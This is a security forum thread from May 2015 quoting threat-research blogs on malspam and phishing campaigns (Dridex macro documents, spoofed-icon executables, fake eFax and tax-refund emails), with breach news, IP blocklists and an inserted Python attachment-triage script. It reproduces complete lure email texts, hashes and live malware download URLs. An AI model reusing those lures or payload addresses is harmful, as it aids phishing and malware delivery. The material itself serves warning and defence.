- http://blog.mxlab.eu/2015/05/15/fake-email-invoices-april-2015-with-attached-malicious-word-file/
May 15, 2015 - "... intercepted a new trojan distribution campaign by email with the subjects like:
Financial information: Invoices April 2015
Important notice: Invoices April 2015
Important information: Invoices April 2015
Need your attention: Invoices April 2015
This email is sent from the -spoofed- address and has the following body:
Congratulations
Hope you are well
Please find attached the statement that matches back to your invoices.
Can you please sign and return.
Robin Wolfe
Dear Sir/Madam,
I trust this email finds you well,
Please see attached file regarding clients recent bill. Should you need further assistances lease feel free to email us.
Best Regards,
Sophia Watts
Accounts Receivables
Good morning
Hi,
Please find attached a recharge invoice for your broadband.
Many thanks,
Tabatha Murphy
The 49 kB attached file, named veizaioj_87B9A16BB5.doc (characters will vary), is a malicious Word file with an embedded macro that will download -other- malware on the system. The Word file is labelled as Malware!9f6e by 1 of the 57 AV engines at Virus Total*..."
* https://www.virustotal.com/en/file/fbc58f82f9231d8ee7598aa7da82a2f67e5f8d85297bd12373a5f2f29e738314/analysis/
___
Unknown hackers attack German parliament data network
- http://www.reuters.com/article/2015/05/15/germany-cybersecurity-idUSL5N0Y63P720150515
May 15, 2015 - "Unknown hackers have attacked the German Bundestag lower house of parliament's computer system, a parliamentary spokeswoman said on Friday. German news magazine Der Spiegel's online edition had earlier said that the internal data network had been subject to an attack. It said experts had noticed several days ago that unknown attackers had tried to get into the data network. At almost the same time experts from Germany's domestic intelligence agency (BfV) at the government's cyber defence centre noticed the spying attempt and warned the Bundestag administration, the report said. 'There was an attack on the Bundestag's IT system', parliamentary spokeswoman Eva Haacke said, giving no further details. 'Experts from the Bundestag and the BSI (the German Federal Office for Information Security) are working on it'. In January, German government websites, including Chancellor Angela Merkel's page, were hacked in an attack claimed by a group demanding Berlin end support for the Ukrainian government, shortly before their leaders were to meet."
- http://www.reuters.com/article/2015/05/16/germany-cybersecurity-idUSL5N0Y70HH20150516
May 16, 2015 - "The German Bundestag lower house of parliament is trying to repair its computer system after a hacking attack but there are no indications yet that hackers accessed information, a parliamentary spokeswoman said on Saturday. The Bundestag is analysing what happened and experts from the Bundestag administration and the BSI (the German Federal Office for Information Security) are working to repair the system, the spokeswoman said..."
___
Cyberattack on Penn State said to have come from China
- http://www.reuters.com/article/2015/05/15/pennstate-dataprotection-idUSL3N0Y66PD20150515
May 15, 2015 - "Pennsylvania State University said on Friday that -two- cyberattacks at its College of Engineering, including one in 2012 that originated in China, compromised servers containing information on about 18,000 people. Penn State, a major developer of technology for the U.S. Navy, said there was no evidence that research or personal data such as social security or credit card numbers had been stolen. Cybersecurity firm Mandiant has confirmed that at least one of the two attacks was carried out by a "threat actor" based in China, Penn State said. The source of the other attack is still being investigated. Penn State was alerted about a breach by the Federal Bureau of Investigation in November, Penn State executive vice president Nicholas Jones said in a statement. Mandiant, the forensic unit of FireEye Inc, discovered the 2012 breach during the investigation. Penn State's Applied Research Laboratory spends more than $100 million a year on research, with most of the funding coming from the U.S. Navy..."
- http://it.slashdot.org/story/15/05/15/1725244/penn-state-yanks-engineering-network-from-internet-after-china-based-attack
May 15, 2015 - "Penn State's College of Engineering has disconnected its network* from the Internet in response to two sophisticated cyberattacks – one from what the university called a "threat actor based in China" – in an attempt to recover all infected systems. The university said there was no indication that research data or personal information was stolen in the attacks, though usernames and passwords -had- been compromised.*"
* http://news.psu.edu/story/357656/2015/05/15/administration/college-engineering-network-disabled-response-sophisticated
___
Chinese snoops hid Malware commands On MS TechNet
- http://www.forbes.com/sites/thomasbrewster/2015/05/14/chinese-hackers-abuse-microsoft-site/
May 14, 2015 - "Hackers often try to hide their tracks and ensure their illicit operation is never taken down by hosting pieces of their infrastructure on websites owned by legitimate companies. Usually that’s Twitter, Facebook, Google or other huge, publicly-editable and accessible services. According to security firm FireEye*, Chinese digital spies chose an ideal yet risky target for storing slices of their command and control functions: TechNet, a Microsoft site dedicated to security and IT support. Though TechNet itself was not compromised, the so-called APT17 hackers left encoded IP addresses used to send updates and commands to the group’s ‘BLACKCOFFEE’ malware** in legitimate Microsoft TechNet profile pages and forum threads. The encoding would have made it more difficult to determine the true domain used by the attackers. FireEye and Microsoft worked to block the attackers’ accounts from accessing their profiles, whilst blocking the malicious activity stemming from the site.
** https://a248.e.akamai.net/f/1015/2073/5m/blogs-images.forbes.com/thomasbrewster/files/2015/05/Screen-Shot-2015-05-14-at-11.18.58.png
The APT17 crew had previously used search engines Google and Bing to store their command and control domains, but abusing Microsoft’s TechNet was especially smart, as most businesses rely on using Microsoft services every day. Blocking them would probably cease business operations. “Even with knowledge and detection, blocking traffic to Microsoft sites is impossible to do as every business needs access to their site. Hiding in plain sight is becoming more and more popular as it’s both hard to find and impossible to block,” said Jason Steer, chief security strategist for FireEye in EMEA. “This evolution of technique really is the response from hackers to keep one step ahead of law enforcement agencies. As hackers realised law enforcement can track back, they have had to evolve their tools and techniques from plain text instructions on an IP address in China, to encoding instructions, to using popular websites to ensure their network remains up for as long as possible and undetected for as long as possible.” The APT17 crew have a penchant for playing with western tech companies. FireEye believes they were responsible for the hit on security firm Bit9 in 2013. They also targeted US government entities, the defense industry, law firms, information technology companies and mining organisations."
* https://www.fireeye.com/blog/threat-research/2015/05/hiding_in_plain_sigh.html
May 14, 2015
> https://www.fireeye.com/content/dam/fireeye-www/blog/images/Coercive/apt17-graphic.jpg
- https://atlas.arbor.net/briefs/index#-181898354
May 14, 2015
> http://www.net-security.org/malware_news.php?id=3038
:fear::fear: :mad:
AplusWebMaster
2015-05-18, 12:45
FYI...
Fake 'Amazon Order' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/amazon-co-uk-order-details-89920-02119-38881-73110-word-doc-or-excel-xls-spreadsheet-malware/
18 May 2015 - "'Order Details 89920-02119-38881-73110' pretending to come from Amazon .co .uk <order@ anazon .co .uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... Amazon... does -not- send word doc or pdf attachments to emails so this is obviously a spoof designed to either infect you or steal information...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Order-Details-89920-02119-38881-73110.png
18 May 2015 : ORD-89920-02119-38881-73110.doc - Current Virus total detections: 3/57*
... which downloads infraredme .com/556/455.exe (Virus Total**). There will be other download locations but they all deliver the same Dridex banking Trojan malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0707a5113d517fc1f96784173bc3865521a448ea48e2347e76d63e9cb0752a75/analysis/1431938632/
** https://www.virustotal.com/en/file/5ba1bed8c0ee977b7b2ecd33925883feded97f553f4569e2557afda5737cc77e/analysis/1431939201/
... Behavioural information
TCP connections
185.15.185.201: https://www.virustotal.com/en/ip-address/185.15.185.201/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
infraredme .com: 64.29.151.221: https://www.virustotal.com/en/ip-address/64.29.151.221/information/
___
Fake 'picture message' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/heres-a-picture-message-youve-been-sent-from-07711888963-word-doc-or-excel-xls-spreadsheet-malware/
18 May 2015 - "An email saying 'Here’s a picture message you’ve been sent from 07711888963' with -no- subject pretending to come from +447711862559@mediamessaging .o2 .co .uk (random phone numbers) with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Heres-a-picture-message-youve-been-sent-from-07711888963.png
18 May 2015: PM8963.doc - Current Virus total detections: 3/57**
... the -same- malware downloader and downloading the -same- Dridex banking Trojan as today’s other word doc malware Amazon .co .uk Order Details 89920-02119-38881-73110 – word doc or excel xls spreadsheet malware* ..."
* http://myonlinesecurity.co.uk/amazon-co-uk-order-details-89920-02119-38881-73110-word-doc-or-excel-xls-spreadsheet-malware/
** https://www.virustotal.com/en/file/0707a5113d517fc1f96784173bc3865521a448ea48e2347e76d63e9cb0752a75/analysis/1431940970/
___
Fake multiple Invoice SPAM - malicious attachments
- http://blog.dynamoo.com/2015/05/malware-spam-your-reasoning-stands-in.html
18 May 2015 - "This -fake- financial spam run is similar to this one last week*, and comes with a malicious attachment.
From: Aida Curry
Date: 18 May 2015 at 11:40
Subject: Your reasoning stands in need
Good Afternoon,
We have attained a reimbursement from you for the draft of £ 2909. Please would you secure me with a remittance, in order for me to reconcile the statement.
I will be sending you a pronouncing of outstanding invoices tomorrow, the entire quantum of outstanding is £ 5893 less the 1 draft received making a whole outstanding of £ 2984. We would very much appreciate settlement of this.
As previously mentioned we reversed to a limited company on 1st December 2014. We are desire to conclude all the old checks down, for both tax and year end reasons. We would be very grateful in your assistance in eliciting the outstanding.
If you need any application of bills please do not hesitate to contact us
Regards,
Aida Curry
-------------------
From: Cornelius Douglas
Date: 18 May 2015 at 11:39
Subject: Your reasoning stands in need
Good morning
Please find attached a remittance advice, relating to a outpayment made to you.
Many thanks
Regards,
Cornelius Douglas
Seniour Finance Assistant
-------------------
From: Jewell Shepard
Date: 18 May 2015 at 11:37
Subject: Have a need in your thought
Please, see the attached similar of the remittance.
Please, can you remit a revised pronouncing so we can settle any outstanding balances.
Kind Regards,
Jewell Shepard
Subjects spotted so far are:
In want of your concern
Your reasoning stands in need
Have a need in your thought
Vital announcement 561335
Your advertence stands in need
Grand advert 482209
Important notice 540897
In want of your regarding
In want of your concern
Your reasoning stands in need
Wish to know your thought
Your cognizance is in great necessity
Need your consideration
There seem to be several different attachments, but for the sake of simplicity I have looked at just one. The Hybrid Analysis report shows that this is a MIME attachment that downloads and executes a script from pastebin[.]com/download.php?i=C5KGsRX3 which in turn downloads a malicious executable from 193.26.217[.]220:80/bt/get3.php (Servachok LTD, Russia) which is saved as crypted.120.exe. This executable has a VirusTotal detection rate of 4/57**. The Malwr and Hybrid Analysis reports indicate traffic to 5.63.154.228 (Reg.Ru, Russia) and also show a dropped Dridex DLL with a detection rate of 3/57***."
Recommended blocklist:
5.63.154.228
193.26.217.220 "
* http://blog.dynamoo.com/2015/05/malware-spam-need-your.html
** https://www.virustotal.com/en/file/ffc1f577b754a897bd88fdb67801ea3f87a2bc858700f36dd71e3b67bf0d262d/analysis/1431946975/
*** https://www.virustotal.com/en/file/680a1511d78da0229596a519d194aaa2a885e88148323bc7820e9b143665f76e/analysis/1431947900/
- http://myonlinesecurity.co.uk/some-financial-transaction-word-doc-or-excel-xls-spreadsheet-malware/
18 May 2015
> https://www.virustotal.com/en/file/ffc1f577b754a897bd88fdb67801ea3f87a2bc858700f36dd71e3b67bf0d262d/analysis/1431950899/
... Behavioural information
TCP connections
178.255.83.2: https://www.virustotal.com/en/ip-address/178.255.83.2/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
___
VENOM vulnerability
- https://blogs.oracle.com/security/entry/security_alert_cve_2015_3456
May 15, 2015 - "Oracle just released Security Alert CVE-2015-3456* to address the recently publicly disclosed VENOM vulnerability, which affects various virtualization platforms. This vulnerability results from a buffer overflow in QEMU's virtual Floppy Disk Controller (FDC). While the vulnerability is not remotely exploitable without authentication, its successful exploitation could provide the malicious attacker, who has privileges to access the FDC on a guest operating system, with the ability to completely take over the targeted host system. As a result, a successful exploitation of the vulnerability can allow a malicious attacker to escape the confines of the virtual environment for which he/she had privileges... Oracle has decided to issue this Security Alert based on a number of factors, including the potential impact of a successful exploitation of this vulnerability, the amount of detailed information publicly available about this flaw, and initial reports of exploit code already “in the wild.” Oracle further recommends that customers apply the relevant fixes as soon as they become available...
The list of Oracle products that may be affected by this vulnerability is published at:
- http://www.oracle.com/technetwork/topics/security/venom-cve-2015-3456-2542653.html "
- https://isc.sans.edu/diary.html?storyid=19701
2015-05-16 - "... This vulnerability is important because it has the potential to affect a significant portion of the virtualization platforms that are in common use today, but there is no reason to panic.
* The vulnerability cannot be compromised remotely, nor is it possible to remotely scan for this vulnerability.
* In order for the attacker to even attempt to exploit the vulnerability they need to have administrator-level shell access to a virtualized guest.
* While a proof of concept exists that exploits the vulnerability, nobody has demonstrated any practical use of the exploit.
* Patches are available for all affected virtualization platforms..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3456
Last revised: 05/14/2015
7.7 - (HIGH)
:fear::fear: :mad:
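The items quoted in this thread keep coming back to the same two delivery tricks: a zipped executable (.exe or .scr) dressed up with a PDF icon and a document-looking name, and a Word or Excel attachment whose macro fetches the payload (the Amazon and "picture message" docs in this post, the zipped .exe/.scr items in the posts above). The following is an added example, not code from any of the quoted blogs or from this forum, of a mail-gateway triage check for those two cases in Python. It looks at what the bytes are (PE header, OLE compound file, OOXML zip) rather than at what the name or icon claims, and it opens a zip one level deep. The VBA check on legacy .doc/.xls is a crude byte-pattern heuristic for the VBA project storage names (a proper parser such as oletools' olevba walks the OLE directory instead); the sample attachments are constructed in the block and only borrow file names from the posts above, they are not the real samples.

```python
"""Triage of mail attachments against the two delivery tricks quoted above.
Added example; the sample data is constructed, not real malware."""
import io
import zipfile
from dataclasses import dataclass

PE_MAGIC = b"MZ"                                        # DOS/PE header
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"         # legacy .doc/.xls compound file
ZIP_MAGIC = b"PK\x03\x04"                               # zip / OOXML container
EXECUTABLE_EXT = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs"}
DOCUMENT_EXT = {".pdf", ".doc", ".xls", ".docx", ".xlsx", ".rtf", ".txt"}
OOXML_EXT = {".docx", ".docm", ".xlsx", ".xlsm", ".pptx", ".pptm"}
# OLE directory entry names are UTF-16LE; a macro-carrying .doc/.xls has a
# "Macros" storage with a "_VBA_PROJECT" stream.  Crude heuristic (see lead-in).
OLE_VBA_MARKERS = [s.encode("utf-16-le") for s in ("_VBA_PROJECT", "Macros")]


@dataclass
class Finding:
    name: str      # attachment name; "outer.zip!member" for a zip member
    reason: str


def _ext(name):
    name = name.lower()
    return name[name.rfind("."):] if "." in name else ""


def triage_bytes(name, data):
    """Reasons one file is suspicious, judged by content, not by name alone."""
    reasons = []
    ext = _ext(name)
    parts = name.lower().split(".")
    if data.startswith(PE_MAGIC):
        if ext in EXECUTABLE_EXT:
            reasons.append("PE executable attached to e-mail")
        else:
            reasons.append("PE executable with non-executable extension %s" % (ext or "(none)"))
    if len(parts) >= 3 and "." + parts[-2] in DOCUMENT_EXT:
        reasons.append("double extension .%s.%s" % (parts[-2], parts[-1]))
    if data.startswith(OLE_MAGIC) and any(m in data for m in OLE_VBA_MARKERS):
        reasons.append("OLE document contains a VBA project (macro)")
    if data.startswith(ZIP_MAGIC) and ext in OOXML_EXT:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            if any(n.lower().endswith("vbaproject.bin") for n in z.namelist()):
                reasons.append("OOXML document contains vbaProject.bin (macro)")
    return reasons


def triage_attachment(name, data):
    """Triage one attachment; a .zip container is opened one level deep."""
    findings = [Finding(name, r) for r in triage_bytes(name, data)]
    if _ext(name) == ".zip" and data.startswith(ZIP_MAGIC):
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            for info in z.infolist():
                for r in triage_bytes(info.filename, z.read(info)):
                    findings.append(Finding(name + "!" + info.filename, r))
    return findings


def build_samples():
    """Constructed attachments: names borrowed from the posts, contents fake."""
    fake_pe = PE_MAGIC + b"\x90\x00" + b"\x00" * 58 + b"PE\x00\x00" + b"\x00" * 64
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w") as z:
        z.writestr("scan_32r23rf234gt34_3424ef.exe", fake_pe)     # spoofed-icon exe in a zip
    fake_ole = OLE_MAGIC + b"\x00" * 504 + "_VBA_PROJECT".encode("utf-16-le") + b"\x00" * 40
    zbuf2 = io.BytesIO()
    with zipfile.ZipFile(zbuf2, "w") as z:
        z.writestr("word/document.xml", b"<w:document/>")
        z.writestr("word/vbaProject.bin", fake_ole)                 # macro-enabled OOXML
    return {
        "OX6qoPp98h48.zip": zbuf.getvalue(),
        "ron.schorr_AD8441271C40.doc": fake_ole,
        "remittance.docm": zbuf2.getvalue(),
        "invoice.pdf.exe": fake_pe,
        "statement.pdf": b"%PDF-1.4\n%%EOF\n",
    }


def main():
    for name, data in build_samples().items():
        findings = triage_attachment(name, data)
        print("%-30s %s" % (name, "BLOCK" if findings else "ok"))
        for f in findings:
            print("    %s: %s" % (f.name, f.reason))


if __name__ == "__main__":
    main()
```

The point of checking the first bytes is that neither the "show known file extensions" setting nor the icon resource matters at the gateway: a member that starts with MZ is a program whatever it is called. Nested zips and password-protected archives are left for the reader; the latter should be quarantined rather than scanned.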
AplusWebMaster
2015-05-19, 15:13
FYI...
Fake 'PO :5182015' SPAM - zipped malware
- http://myonlinesecurity.co.uk/shuilingroup-com-po-5182015-malware/
19 May 2015 - "'PO :5182015' pretending to come from shuiling <shuilingroup .com > with a zip attachment is another one from the current bot runs... The email looks like:
Please kindly find the attached file for the new Order we want to place in your esteem company
Kindly send your proforma invoice with your banking information, so that we will start with the needful
Thanks and regards
ATTILIO PASCUCCI
ATTEX S.R.L.
VIA ADIGE, 4 – 22070 LUISAGO – CO (ITALY)
TEL. 0039 031 921648 – FAX 0039 031 3540133
REG. IMPRESE COMO – COD.FISC. – PARTITA IVA: 01542400138
19 May 2015: PO 5182015.zip: Extracts to: PO 5182015.exe
Current VirusTotal detections: 15/57*. This is another one of the spoofed icon files that unless you have "show known file extensions enabled", will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/7ba159e1edb95dacd9bef9ddfa086c8f058aedc9a54bee6a1365b2ace2dd1fb1/analysis/1431986200/
... Behavioural information
TCP connections
186.202.127.118: https://www.virustotal.com/en/ip-address/186.202.127.118/information/
77.88.21.11: https://www.virustotal.com/en/ip-address/77.88.21.11/information/
93.158.134.3: https://www.virustotal.com/en/ip-address/93.158.134.3/information/
___
Fake 'Tax Refund' Phish ...
- http://myonlinesecurity.co.uk/lloyds-bank-refund-2014-tax-refund-phishing/
19 May 2015 - "An email received with a subject of 'Lloyds Bank Refund' -or- 'refund' -or- '2014 Tax Refund' pretending to come from Lloyds Bank. Some of the major common subjects in a phishing attempt are Tax returns or Bank refunds, especially in the UK, where you need to submit your Tax Return online. This one only wants your personal bank log in details...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/lloyds-bank-tax-refund-phish.png
If you are unwise enough to follow the link you see a webpage looking like the genuine Lloyds log in page, look carefully at the -url- in the top bar and you can see it isn’t Lloyds at all but a -fake- site:
- http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/lloyds-bank-tax-refund-phish_webpage1.png
If you still haven’t realised that it is a -phishing- attempt and give them your username & password, you will be sent to the next page which asks for your memorable information. You then get -bounced- on to the genuine Lloyds Bank site. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___
Fake 'Tax increase alert' SPAM – PDF malware
- http://myonlinesecurity.co.uk/tax-increase-alert-fake-pdf-malware/
19 May 2015 - "'Tax increase alert' -or- 'adjustment guidance' are 2 of the subjects that appear in a whole series of mal-spam emails with the basic subject of VAT increases or changes that are being spammed out. They come with a randomly named zip attachment from random senders and random email addresses and are another one from the current bot runs... The name of the alleged sender does NOT match the name in the body of the email. Some of the subjects seen in this series of mal-spam emails are:
Tax increase alert, adjustment guidance, adjustment report, adjustment notice, change guidance, Custom increase notification, Custom change alert, Duties increase notification, Toll increase notification, Tax change reminder, Levy increase guidance, Duties adjustment alert, change notification, Toll change report and loads of other similar variations on this tax theme... The email looks like:
We inform you that VAT increases from Wednesday.
View the document below.
Remeber that levy values to be settled to the treasury are going to be reevaluated.
Susan Lewis
Senior Consultant
-Or-
Be noted that VAT doubles until Wednesday.
Observe the act enclosed.
Do not forget that tax amounts to be paid to the state will be reestimated.
Rebecca Morgan
-Or-
Tax Consultant
Be noted that VAT increases on Friday.
Observe the file below.
Note that tax amounts to be paid to the treasury will be reevaluated.
Rebecca Nelson
Chief accountant
-Or-
Please be informed that VAT alters until Tuesday.
Observe the file attached.
Remeber that sums to be paid to the state are going to be reevaluated.
Susan Jackson
Tax authority
19 May 2015: Doc#844931.zip: Extracts to: fax2_info.exe
Current VirusTotal detections: 3/57*. This is another one of the spoofed icon files that unless you have "show known file extensions enabled", will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c7d2629f3d74208c72cee24d9822ec58e3fed9401e8fc4276fdd05f15d5b7d5f/analysis/1432035348/
___
Fake 'eFax msg' SPAM - malware links
- http://blog.dynamoo.com/2015/05/malware-spam-australian-taxation-office.html
19 May 2015 - "Apparently the Australian Taxation Office thinks I have a fax.. or perhaps it is something more sinister?
From: Australian Taxation Office [noreply @ ato .gov .au]
Date: 19 May 2015 at 12:48
Subject: eFax message - 2 page(s)
Fax Message [Caller-ID: 408-342-0521]
You have received a 2 pages fax at 2015-05-19 08:18:16 AM EST.
* The reference number for this fax is
min2_did16-0884196800-3877504043-49.
View this fax using your PDF reader...
Predictably, the link leads to a malicious download (this time at storage-ec2-24.sharefile .com) named Fax_00491175.zip and containing in turn a malicious executable Fax_00491175.scr. This executable has a detection rate of 5/57*. Automated analysis tools... show that it downloads a further component from:
http ://employmentrisk .com/images/1405uk77.exe
In turn, this has a detection rate of 4/57** and the Hybrid Analysis report indicates that it tries to communicate with 194.28.190.183 (AgaNet Agata Goleniewska, Poland).
Recommended blocklist:
employmentrisk .com
194.28.190.183 "
* https://www.virustotal.com/en/file/ea62d16f13d14eeda2bdefd7cfebf7c77a9a3bb11a5886440cfc669a6f9ff629/analysis/1432038054/
** https://www.virustotal.com/en/file/ddb2a2f6d5f30f74b46311e8d976334037af5043999c29c68d96b9a399b491bb/analysis/1432038513/
employmentrisk .com: 74.116.2.117: https://www.virustotal.com/en/ip-address/74.116.2.117/information/
storage-ec2-24.sharefile .com: 52.0.190.130: https://www.virustotal.com/en/ip-address/52.0.190.130/information/
eFax Corporate Spam
- http://threattrack.tumblr.com/post/119358539478/efax-corporate-spam
May 19, 2015 - "Subjects Seen:
eFax message - 3 page(s)
Typical e-mail details:
Fax Message [Caller-ID: 626-271-6819]
You have received a 3 pages fax at 2015-05-19 08:18:18 AM EST.
* The reference number for this fax is
min2_did48-5711163227-0231815252-98.
View this fax using your PDF reader.
Screenshot: https://40.media.tumblr.com/cc50f039e1e8fd8c09231d50c07b380c/tumblr_inline_nolmajsYzj1r6pupn_500.png
Malicious URLs
storage-usw-8.sharefile.com/download.ashx?dt=dtba0aacb3cd344005be90d949470aa333&h=9Ueg3YdEIMuDH72YnA29c7h2EL7zh355nI387gxb7Kc%3d
Malicious File Name and MD5:
Fax_00491175.scr (a6aa82995f4cb2bd29cdddedd3572461)
Tagged: eFax, Upatre
___
Bad taste left in Angler EK by MBAE
- https://blog.malwarebytes.org/exploits-2/2015/05/exploit-kit-authors-give-up-on-malwarebytes-users/
May 19, 2015 - "... as discovered by Kafeine*, the latest version of Angler EK... also checks to see if either Malwarebytes Anti-Malware or Anti-Exploit are installed on the target system... If Malwarebytes software is installed, then the exploit kit will silently exit and not even attempt to launch further exploits or malware..."
* http://malware.dontneedcoffee.com/2014/10/cve-2013-7331-and-exploit-kits.html?q=CVE-2013-7331
Malwarebytes Anti Exploit - Free: https://www.malwarebytes.org/antiexploit/
___
How much money do cyber crooks collect via crypto ransomware?
- http://net-security.org/malware_news.php?id=3042
19.05.2015 - "FireEye researchers* have calculated that the cybercriminals wielding TeslaCrypt and AlphaCrypt have managed to extort $76,522 from 163 victims in only two months..."
* https://www.fireeye.com/blog/threat-research/2015/05/teslacrypt_followin.html
___
Bitly Imitation leads to Malware...
- https://blog.malwarebytes.org/security-threat/2015/05/bitly-imitation-leads-to-malware-download/
May 18, 2015 - "URL shortening services can be a marketing person’s and social media buff’s best friend. However, they can become a worry for users who are conscious about the security of their systems and personal information. Not only do these services trim down the character count of a URL while monitoring clicks, online -criminals- also use such services to mask malicious URLs. Among the URL shorteners available online, Bitly remains one of the three most popular brands, alongside Goo.gl and Ow.ly. Although the bit.ly URL has been in service since 2008, we’re only beginning to see several -bogus- iterations of it being used in the wild. We’ve seen a number of accounts on YouTube and others sharing various links to game cracks from the imitation Bitly URL, btly[DOT]pw... Elsewhere, another imitation Bitly link — this time, btly[DOT]org—is said to be used in a spam campaign that led recipients to a fake BBC site that advertises questionable Garcinia Cambogia dietary supplements. Please be reminded that the official website for Bitly where users can visit to shorten URLs is https ://bitly .com. Shortened URLs always begin with bit. ly. Everything else that resembles the real thing may need to be ignored, reported, and/or blacklisted."
AplusWebMaster
2015-05-21, 13:16
FYI...
Fake 'Invoice# 2976361' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/05/malware-spam-invoice-2976361-attached.html
21 May 2015 - "So far I have only seen one sample of this. The sender and subject may vary.
From: PGOMEZ@polyair .co .uk
Date: 21 May 2015 at 08:58
Subject: Invoice# 2976361 Attached
Invoice Attached - please confirm..
Attached is a malicious file with the not-very-imaginative name 00001.doc [VT 4/56*] which contains this malicious macro [pastebin] that downloads a component from the following location:
http ://mercury.powerweave .com/72/11.exe
This download site is hosted on 50.97.147.195 (Softlayer Technologies, US / Powerweave Software Services, India), although be aware that -other- versions of the macro may download from other locations. This file is saved as %TEMP%\ribasiml.exe and has a VirusTotal detection rate of 5/57**. Automated analysis tools... show attempted communications with the following IPs:
78.24.218.186 (TheFirst-RU, Russia)
78.46.60.131 (Hetzner, Germany)
87.236.215.151 (OneGbits, Lithuania)
94.242.58.146 (Fishnet Communications, Russia)
130.208.166.65 (The University of Iceland, Iceland)
176.31.28.250 (OVH, France / Bitweb LLC, Russia)
185.12.95.191 (RuWeb, Russia)
The Malwr report shows that it drops a Dridex DLL with a detection rate of 4/57***.
Recommended blocklist: ..."
* https://www.virustotal.com/en/file/7435b4478e8c0bf3fef5fdf43998e5ba4ce646a03376ad2c278399437c5185e5/analysis/1432196986/
** https://www.virustotal.com/en/file/41eab1c139eda5740b44ea1dcf82cc427526027a60ada2c6f887a2e74b761c4e/analysis/1432197071/
*** https://www.virustotal.com/en/file/5916c159345858808da9b709349ab6364605da0a27c0392df0cc78ba824598e7/analysis/1432198215/
- http://myonlinesecurity.co.uk/invoice-2976361-attached-word-doc-or-excel-xls-spreadsheet-malware/
21 May 2015
> https://www.virustotal.com/en/file/7435b4478e8c0bf3fef5fdf43998e5ba4ce646a03376ad2c278399437c5185e5/analysis/1432194451/
000001.DOC
mercury.powerweave .com: 50.97.147.195: https://www.virustotal.com/en/ip-address/50.97.147.195/information/
___
Fake 'Travel order confirmation' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/travel-order-confirmation-0300202959-word-doc-or-excel-xls-spreadsheet-malware/
21 May 2015 - "'Travel order confirmation 0300202959' pretending to come from overseastravel@ caravanclub .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear Customer,
Thank you for your travel order.
Please find attached your booking confirmation which you should take with you on your trip. Please note we no longer send tickets for overseas travel bookings.
Now you have booked your trip why not let The Club help you make the most of your stay?
Did you know The Club has a wide selection of travel advice on the website as well as directions to all our overseas sites?
Want some inspiration on more sites across Europe? Take a look at our Caravan Europe Guides.
If you’ve not already taken out holiday insurance why not let The Club give you a Red Pennant quote online .
Yours sincerely
The Caravan Club
This email is sent from the offices of The Caravan Club, a company limited by guarantee (Company Number: 00646027). The registered office is East Grinstead House, London Road, East Grinstead, West Sussex, RH19 1UA...
21 May 2015: Travel Order Confirmation – 0300202959.doc
Current Virus total detections: 4/57* ... downloads -same- Dridex malware as today’s other word doc malspam run Invoice# 2976361 Attached – word doc or excel xls spreadsheet malware:
- http://myonlinesecurity.co.uk/invoice-2976361-attached-word-doc-or-excel-xls-spreadsheet-malware/
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c85b4fd1dc7e487995d975d9146ba7d85566bfbbe283e6af692643517eaaa2ef/analysis/1432197951/
- http://blog.dynamoo.com/2015/05/malware-spam-travel-order-confirmation.html
21 May 2015 - "... Travel Order Confirmation - 0300202959.doc, however the payload seems to be identical to the one found in this earlier spam run*."
* http://blog.dynamoo.com/2015/05/malware-spam-invoice-2976361-attached.html
___
Fake 'Pampered Chef' SPAM – PDF malware
- http://myonlinesecurity.co.uk/recipes-for-your-new-pampered-chef-baker-fake-pdf-malware/
21 May 2015 - "'Recipes for your new Pampered Chef Baker' coming from random names and random email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Hello!
I know you’ll love your new Pampered Chef baker! Thank you for your order.
Attached are Deep Covered Baker recipes.
Many Deep Covered Baker Recipes can also be made in the smaller, Round Covered Baker.
For microwave recipes, use half the ingredients and half the bake time suggested. For oven recipes, use half the ingredients but follow recommended bake times or visual indicators in the recipe.
Enjoy!
Please contact me if you have questions or concerns.
Thank you,
Robbin
21 May 2015: Pampered_ingredients.zip: Extracts to: Pampered_ingredients.exe
Current Virus total detections: 3/57* . There are several different versions of the malware floating around. This is just one example. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4989d42b831e69a3b50bd4edfd3421e973bf100aad7928dcad59704f3fa18876/analysis/1432205437/
___
Fake 'Unpaid Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/unpaid-invoice-hmrc-fake-pdf-malware/
21 May 2015 - "'Unpaid Invoice' pretending to come from HMRC .gov .uk <application@ hmrc .gov .uk> with a zip attachment is another one from the current bot runs... The email looks like:
Please pay this invoice at your earliest opportunity.
21 May 2015: invoice_8467_08202014.zip: Extracts to: invoice_8467_08202014.scr
